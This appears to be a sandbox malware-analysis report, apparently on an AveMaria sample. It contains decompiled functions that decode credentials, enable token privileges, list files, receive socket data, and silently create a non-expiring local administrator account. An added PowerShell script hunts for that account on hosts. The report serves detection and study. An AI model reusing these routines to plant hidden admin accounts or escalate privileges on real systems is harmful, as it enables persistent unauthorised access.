                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 0e41e32ab8529b89cfc9c15556c76dd3341a685d90ea54b3428443690f48773c
                                      • Instruction ID: 90512de610bc907605d25dbb147376f56d4fdec8015d53dea22a85c176bcbbf6
                                      • Opcode Fuzzy Hash: 0e41e32ab8529b89cfc9c15556c76dd3341a685d90ea54b3428443690f48773c
                                      • Instruction Fuzzy Hash: F831E87591122DABCB21DF28D8887DDBBF8BF18310F5042EAE51CA7250E7309B958F44
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      C-Code - Quality: 92%
                                      			E00259E04(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
                                      				int _v8;
                                      				DWORD* _v12;
                                      				DWORD* _v16;
                                      				void* _v20;
                                      				int _v24;
                                      				BYTE* _v28;
                                      				char _v32;
                                      				char _v8128;
                                      				int _t27;
                                      				CHAR* _t39;
                                      				void* _t43;
                                      
                                      				_t43 = __ecx;
                                      				E00251130(0x1fbc, __ecx);
                                      				_v8 = 0x1fa0;
                                      				_t27 = lstrlenA(_a4);
                                      				E00251052( &_v8128, 0, 0x1fa0);
                                      				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
                                      				_v32 = 0;
                                      				_v28 =  &_v8128;
                                      				_v24 = _v8;
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v20 = 0;
                                      				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
                                      				 *((char*)(_v12 + _v16)) = 0;
                                      				_t39 = E00255A3C(_v12 + 1);
                                      				 *_a8 = _t39;
                                      				return lstrcpyA(_t39, _v16);
                                      			}

                                      Instruction addresses: 0x00259e04, 0x00259e0c, 0x00259e1e, 0x00259e21, 0x00259e34, 0x00259e4f, 0x00259e5b, 0x00259e5e, 0x00259e64, 0x00259e6f, 0x00259e73, 0x00259e76, 0x00259e79, 0x00259e85, 0x00259e8e, 0x00259e9a, 0x00259ea6

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,?,00000000,?,002596F1,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 00259E21
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00259E4F
                                        • Part of subcall function 00255A3C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0025347F,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00255A46
                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00259E9C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                      • String ID:
                                      • API String ID: 573875632-0
                                      • Opcode ID: d5d1ad97f50a7825d2e8ada61b50883cbed24518320e03f5d34aee94a6d78776
                                      • Instruction ID: 97bed41ab49a00d9fccbf83a262132bf96cbfb33be078c08d942913fc2f9c9a2
                                      • Opcode Fuzzy Hash: d5d1ad97f50a7825d2e8ada61b50883cbed24518320e03f5d34aee94a6d78776
                                      • Instruction Fuzzy Hash: 3911D8B5D00119EFCB01DFA4D8848EEBBB8EF08344F1081AAE909A2241D7759A15CBA0
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 60%
                                      			E0025D609(void* __ecx, WCHAR** __edx) {
                                      				// __ecx: process handle; __edx: pointer to the name of the privilege to enable (not visible here).
                                      				void* _v8;
                                      				long _v12;
                                      				struct _LUID _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				struct _TOKEN_PRIVILEGES _v36;
                                      				struct _TOKEN_PRIVILEGES _v52;
                                      				WCHAR** _t33;
                                      
                                      				asm("stosd");
                                      				asm("xorps xmm0, xmm0");
                                      				_v8 = 0;
                                      				_t33 = __edx;
                                      				asm("movlpd [ebp-0x10], xmm0");
                                      				_v12 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				// 0x28 = TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x08); the LUID of the named privilege lands in _v20
                                      				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
                                      					L4:
                                      					return 0;
                                      				} else {
                                      					// One-entry TOKEN_PRIVILEGES: PrivilegeCount = 1, Luid = _v20, Attributes = SE_PRIVILEGE_ENABLED (2)
                                      					_v36.Privileges = _v20.LowPart;
                                      					_v28 = _v20.HighPart;
                                      					_v36.PrivilegeCount = 1;
                                      					_v24 = 2;
                                      					// 0x10 = sizeof(TOKEN_PRIVILEGES) with a single entry. A non-zero return does not prove the
                                      					// privilege was enabled: when the token does not hold it the call still returns TRUE and
                                      					// GetLastError() is ERROR_NOT_ALL_ASSIGNED, which this function never checks.
                                      					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
                                      						goto L4;
                                      					}
                                      					return 1;
                                      				}
                                      			}

                                      Instruction addresses for the listing above (the per-line address column of the original layout): 0x0025d617 through 0x0025d688.

                                      APIs
                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0025C423), ref: 0025D634
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0025D645
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0025D67A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                      • String ID:
                                      • API String ID: 658607936-0
                                      • Opcode ID: 84c3b3695e2662c864e8060adad025688b7097d55a60a20dcbeff597a91dc1fd
                                      • Instruction ID: 3c0b510c7b5241a5b6e53cfcdd2e98d2973c7e62742688033136c16397f0555f
                                      • Opcode Fuzzy Hash: 84c3b3695e2662c864e8060adad025688b7097d55a60a20dcbeff597a91dc1fd
                                      • Instruction Fuzzy Hash: 69111F75A10619BFEB10CFA5DC449EFF7FCFB48750F10452AE901F2150E6B09A098BA1
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,012E528B,?,00000000,?,?), ref: 012E52AE
                                      • TerminateProcess.KERNEL32(00000000,?,012E528B,?,00000000,?,?), ref: 012E52B5
                                      • ExitProcess.KERNEL32 ref: 012E52C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 207302c2ab76863a9a3756bea3698b6b3ebcbdb834c5c22a6b6f545b55b996dd
                                      • Instruction ID: 2cfcc268a3e4c65abb777d528f662a0db9a5a6530d44101d9517c224c354f33f
                                      • Opcode Fuzzy Hash: 207302c2ab76863a9a3756bea3698b6b3ebcbdb834c5c22a6b6f545b55b996dd
                                      • Instruction Fuzzy Hash: C0E08C39021909AFCF2A6F69D92CA1D3FECFB01345F800415FB0986130CB36D882CB80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 6c3a32756ac9c0eaddd19bb26ad634daae8f7441e9f5c95f4d6ccfc143efdc6b
                                      • Instruction ID: ee0ac2daca9a41eff6c5bdb5cc3722e711cc4ec8e7d396a3d1cc24a357d645b4
                                      • Opcode Fuzzy Hash: 6c3a32756ac9c0eaddd19bb26ad634daae8f7441e9f5c95f4d6ccfc143efdc6b
                                      • Instruction Fuzzy Hash: E131367581020EAFEB29CE6CCC88EFE7BFDDF85354F440198EA9997251E6309D458B90
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction ID: e8112566a8d57e75b281da41d1531d13d3067abfe9fc17de9839b03db5f95da9
                                      • Opcode Fuzzy Hash: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction Fuzzy Hash: 8F025C71E1021A9FDF14CFA9C8846AEBBF1FF88314F55826ED919A7345E731A901CB80
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 72%
                                      			E0025DEC5(void* __ecx, void* __eflags, WCHAR* _a4) {
                                      				// __ecx: receiver for the resulting entry list; _a4: search pattern handed to FindFirstFileW.
                                      				// The pattern string is freed before returning, so ownership of it passes to this function.
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				char _v28;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _v56;
                                      				struct _WIN32_FIND_DATAW _v648;
                                      				intOrPtr _t39;
                                      				void* _t62;
                                      				void* _t75;
                                      				void* _t76;
                                      				void* _t77;
                                      				void* _t79;
                                      
                                      				_v20 = _v20 & 0x00000000;
                                      				_t39 = 5;
                                      				_t75 = __ecx;
                                      				_v16 = _t39;
                                      				_v24 = _t39;
                                      				E00251815( &_v28, __eflags);
                                      				_t62 = FindFirstFileW(_a4,  &_v648);
                                      				_t79 = _t62 - 0xffffffff;   // 0xffffffff = INVALID_HANDLE_VALUE: the body runs only if the search opened
                                      				while(_t79 != 0) {
                                      					_v56 = _v56 & 0x00000000;
                                      					__eflags = _v648.dwFileAttributes & 0x00000010;   // 0x10 = FILE_ATTRIBUTE_DIRECTORY
                                      					if((_v648.dwFileAttributes & 0x00000010) == 0) {
                                      						// regular file: is_dir = 0, keep the 64-bit size
                                      						_t16 =  &_v40;
                                      						 *_t16 = _v40 & 0x00000000;
                                      						__eflags =  *_t16;
                                      						_v48 = _v648.nFileSizeLow;
                                      						_v44 = _v648.nFileSizeHigh;
                                      					} else {
                                      						// directory: is_dir = 1, size zeroed
                                      						asm("xorps xmm0, xmm0");
                                      						_v40 = 1;
                                      						asm("movlpd [ebp-0x2c], xmm0");
                                      					}
                                      					// convert cFileName and append one 0x18-byte record { name, size_low, size_high, is_dir } to the list
                                      					E00253264( &_v56, E00253412( &_v12,  &(_v648.cFileName)));
                                      					E00255A2D(_v12);
                                      					_v12 = _v12 & 0x00000000;
                                      					_t77 = _t77 - 0x18;
                                      					_t76 = _t77;
                                      					E0025345A(_t76,  &_v56);
                                      					 *((intOrPtr*)(_t76 + 8)) = _v48;
                                      					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
                                      					 *(_t76 + 0x10) = _v40;
                                      					E00251716( &_v28);
                                      					E00255A2D(_v56);
                                      					__eflags = FindNextFileW(_t62,  &_v648);   // the loop continues while FindNextFileW succeeds
                                      				}
                                      				E00251301(_t75, _t79,  &_v28);
                                      				_t73 = _v28;
                                      				if(_v28 != 0) {
                                      					E00251A75(_t73, _t73);
                                      				}
                                      				E00255A2D(_a4);   // free the pattern string (VirtualFree, see the E00255A2D subcall trace in the next listing)
                                      				return _t75;
                                      			}

                                      Instruction addresses for the listing above (the per-line address column of the original layout): 0x0025dece through 0x0025dfc8.

                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0025DEF2
                                      • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 0025DF94
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 24327ee636a546058b39f23379d4f407877901c3dc8e3fc610cb61341d4fc308
                                      • Instruction ID: 5876c7648d9285b989280f7ad3af5051e42af5729c9cd1721e552b82c1b8a862
                                      • Opcode Fuzzy Hash: 24327ee636a546058b39f23379d4f407877901c3dc8e3fc610cb61341d4fc308
                                      • Instruction Fuzzy Hash: 6E317371D112099BCB20EFA4C999BEEBBF4AF48312F104159E806B3241EB749E58CF54
                                      Uniqueness

                                      Uniqueness Score: 0.95%

                                      C-Code - Quality: 50%
                                      			E0025B799(char _a4, char _a8) {
                                      				// _a4: pointer to the WCHAR* account name; _a8: pointer to the WCHAR* password.
                                      				// Creates a local account and puts it into the local administrators group.
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v32;
                                      				void _v36;
                                      				void* _t22;
                                      				intOrPtr* _t25;
                                      				signed int _t30;
                                      				intOrPtr* _t38;
                                      
                                      				_t38 = _a4;
                                      				_t30 = 8;
                                      				memset( &_v36, 0, _t30 << 2);   // zero a 32-byte USER_INFO_1 (8 DWORD fields)
                                      				_v36 =  *_t38;                   // usri1_name
                                      				_v24 = 1;                        // usri1_priv = USER_PRIV_USER
                                      				_v20 = 0;                        // usri1_home_dir
                                      				_v32 =  *_a8;                    // usri1_password
                                      				_t22 =  &_v36;
                                      				_v16 = 0;                        // usri1_comment
                                      				_v12 = 0x10201;                  // usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD
                                      				_v8 = 0;                         // usri1_script_path
                                      				__imp__NetUserAdd(0, 1, _t22, 0);   // servername NULL = local machine, level 1 = USER_INFO_1
                                      				_t42 = _t22;
                                      				if(_t22 != 0) {
                                      					L3:
                                      					__eflags = 0;
                                      					return 0;
                                      				}
                                      				_a4 =  *_t38;
                                      				// E0025D508 builds the SID with sub-authorities 0x20/0x220 (S-1-5-32-544, BUILTIN\Administrators, see the
                                      				// subcall trace below) and resolves it with LookupAccountSidW, so the group name is correct on any locale.
                                      				_t25 = E0025D508( &_a8, _t42);
                                      				// level 3 = LOCALGROUP_MEMBERS_INFO_3: one member given as a "domain\name" string
                                      				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
                                      				E00255A2D(_a8);
                                      				if(_t25 != 0) {
                                      					goto L3;
                                      				}
                                      				return 1;
                                      			}

                                      Instruction addresses for the listing above (the per-line address column of the original layout): 0x0025b7a1 through 0x0025b814.

                                      APIs
                                      • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,00267D34,?,?,?,0025C8B8,00267D30,00267D34), ref: 0025B7DB
                                        • Part of subcall function 0025D508: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0025B7F2,?,?,00000001), ref: 0025D55D
                                        • Part of subcall function 0025D508: LookupAccountSidW.ADVAPI32(00000000,0025B7F2,?,00000104,?,00000010,?), ref: 0025D582
                                        • Part of subcall function 0025D508: GetLastError.KERNEL32(?,?,00000001), ref: 0025D58C
                                        • Part of subcall function 0025D508: FreeSid.ADVAPI32(0025B7F2,?,?,00000001), ref: 0025D59A
                                      • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0025C8B8,00267D30,00267D34), ref: 0025B7FC
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                      • String ID:
                                      • API String ID: 188019324-0
                                      • Opcode ID: 88accb11fecb0d3fd1e6edff270b09c4d74cbcc95723839a45f52f8e7e46205a
                                      • Instruction ID: 9cded53847c21317aea66958988dd6efe8dcdadaec8a3ecb5a502232d2bb78f6
                                      • Opcode Fuzzy Hash: 88accb11fecb0d3fd1e6edff270b09c4d74cbcc95723839a45f52f8e7e46205a
                                      • Instruction Fuzzy Hash: E5114C72910208AFDB11DFA9D8849AEB7FCEF58315B00802AE901EB250D7B09A088B60
                                      Uniqueness

                                      Uniqueness Score: 100.00%
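As an added hunting example (not code from the sample, from AveMaria, or from this Joe Sandbox report): a PowerShell script that looks for the outcome of E0025B799 on a host. It resolves S-1-5-32-544 to its local group name by SID, the same locale-independent step the subcall performs with AllocateAndInitializeSid and LookupAccountSidW, then lists enabled local accounts whose password never expires (the UF_DONT_EXPIRE_PASSWD bit in the 0x10201 flags) and that are members of that group, and finally correlates Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) on the new account's SID rather than on its name. The 24-hour lookback window, the output shape, and the assumption that the "User Account Management" and "Security Group Management" audit subcategories are enabled are mine.

```powershell
#Requires -RunAsAdministrator
# Hunting example written for this report; assumes Windows PowerShell 5.1+ with the
# Microsoft.PowerShell.LocalAccounts module and Security auditing for 4720/4732 enabled.
param([int]$LookbackHours = 24)   # assumed window, adjust to the incident timeline

# 1. Resolve the well-known SID the way the sample does, so the check works on localized systems.
$adminSid  = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'
$adminName = $adminSid.Translate([System.Security.Principal.NTAccount]).Value   # e.g. BUILTIN\Administrators

# 2. Current state: enabled local users with a non-expiring password that are in the administrators group.
#    Get-LocalUser exposes PasswordExpires as $null when UF_DONT_EXPIRE_PASSWD is set.
$adminMemberSids = @(Get-LocalGroupMember -SID $adminSid -ErrorAction SilentlyContinue |
                     ForEach-Object { $_.SID.Value })
$currentSuspects = @(Get-LocalUser | Where-Object {
    $_.Enabled -and ($null -eq $_.PasswordExpires) -and ($adminMemberSids -contains $_.SID.Value)
})

# 3. History: a 4720 followed by a 4732 whose MemberSid is the freshly created account and whose
#    TargetSid is S-1-5-32-544. Event data is read by field name from the event XML, not by index.
function ConvertTo-EventData {
    param($Event)
    $data = @{}
    $xml = [xml]$Event.ToXml()
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

$since  = (Get-Date).AddHours(-$LookbackHours)
$events = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } `
                         -ErrorAction SilentlyContinue)

$created = @{}
foreach ($e in ($events | Where-Object Id -eq 4720)) {
    $d = ConvertTo-EventData $e
    $created[$d.TargetSid] = [pscustomobject]@{
        Name      = $d.TargetUserName
        CreatedAt = $e.TimeCreated
        CreatedBy = $d.SubjectUserName
    }
}

$createThenAdmin = @(foreach ($e in ($events | Where-Object Id -eq 4732)) {
    $d = ConvertTo-EventData $e
    if ($d.TargetSid -eq $adminSid.Value -and $created.ContainsKey($d.MemberSid)) {
        $c = $created[$d.MemberSid]
        [pscustomobject]@{
            Account      = $c.Name
            Sid          = $d.MemberSid
            CreatedAt    = $c.CreatedAt
            CreatedBy    = $c.CreatedBy
            AddedToGroup = $e.TimeCreated
            GapSeconds   = [int](($e.TimeCreated - $c.CreatedAt).TotalSeconds)
        }
    }
})

# Emit one object so the result can be piped into further triage or exported.
[pscustomobject]@{
    AdminGroup      = $adminName
    CurrentSuspects = $currentSuspects | Select-Object Name, SID, LastLogon
    CreateThenAdmin = $createThenAdmin | Sort-Object AddedToGroup
}
```

A 4720/4732 pair only seconds apart for the same SID, created by a non-administrative interactive user, is the fingerprint of the NetUserAdd followed by NetLocalGroupAddMembers sequence above; a legitimate provisioning tool normally runs as a service or deployment account and rarely sets a non-expiring password on a new administrator. The script reports nothing for the historical part when the two audit subcategories are off, so check `auditpol /get /category:"Account Management"` before trusting an empty result.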

                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,012EFA14,?,?,00000008,?,?,012EF6A7,00000000), ref: 012EFC46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 6cdaea42bcaf25f069a8af3df99528efc3a79db25031f37a374c5b043883d1e7
                                      • Instruction ID: 6bcb08571a6046e8bf81c21d9ca29c63303f97de25dcfb00cdd7cc149f7b0879
                                      • Opcode Fuzzy Hash: 6cdaea42bcaf25f069a8af3df99528efc3a79db25031f37a374c5b043883d1e7
                                      • Instruction Fuzzy Hash: 56B15B322206099FEB15CF2CC59AB647BE0FF49364F658658EA99CF2A1C335D991CB40
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 64%
                                      			// Receive loop. Each pass zeroes a 4 KiB stack buffer, calls recv (WS2_32 ordinal 16,
                                      			// see the APIs entry below) for up to 0x1000 bytes on the socket stored at _a4[0], and
                                      			// passes the received bytes to E0025B62E together with the value at _a4[4]. The loop
                                      			// ends when recv returns SOCKET_ERROR (-1) or when E0025B62E returns 0; a recv return
                                      			// of 0 (peer closed the connection) is not checked and is handed to E0025B62E as well.
                                      			E0025B424(void* __ecx, void* __eflags, intOrPtr* _a4) {
